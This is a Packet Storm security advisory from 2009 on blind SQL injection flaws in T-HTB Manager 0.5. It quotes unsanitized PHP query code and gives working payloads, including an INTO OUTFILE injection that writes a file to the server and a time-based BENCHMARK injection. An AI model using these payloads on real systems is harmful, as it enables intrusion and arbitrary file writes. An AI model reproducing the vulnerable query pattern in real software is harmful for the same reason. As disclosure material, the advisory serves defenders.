exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

T-HTB Manager 0.5 Blind SQL Injection

T-HTB Manager 0.5 Blind SQL Injection
Posted Sep 10, 2009
Authored by Salvatore Fresta

T-HTB Manager version 0.5 suffers from multiple blind SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
SHA-256 | 025a956f393c0995276e6e39d521dcf050b7d996721072dee0b244bcb116c5f5

T-HTB Manager 0.5 Blind SQL Injection

Change Mirror Download
********   Salvatore "drosophila" Fresta   ********

[+] Application: T-HTB Manager
[+] Version: 0.5
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page

[+] Bugs: [A] Multiple Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: index.php

All fields in this script are not sanitized but any
outputs aren't returned.

...

case 'delete_category':
$id = $_GET['id'];
$id_interfaces = $_GET['id_interfaces'];

if($id>0)
{
$query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";
$db_query = mysql_query($query);

...

case 'update_category':
$name = $_POST['name'];
$id = $_POST['id'];

$rate = $_POST['rate'];
$ceil = $_POST['ceil'];
$burst = $_POST['burst'];
$prio = $_POST['prio'];
$monitor = $_POST['monitor'];

if(strlen($name)>0 && $id>0)
{
$nodelft = $_POST['nodelft'];

$lft = $_POST['lft'];
$rgt = $_POST['rgt'];

$query = "UPDATE ".$table_name." set name='" . $name . "' , lft='" . $lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";

...

And many others..


***************************************************

[+] Code


- [A] Multiple Blind SQL Injection

This is a Blind SQL Injection bug but into the
database there aren't very reserved information
such as usernames and/or passwords. However this
injection can be used to write arbitrary files
on the server (when allowed).

http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php

Send it as a POST packet:

action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23


***************************************************

[+] Fix

No fix.


***************************************************
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close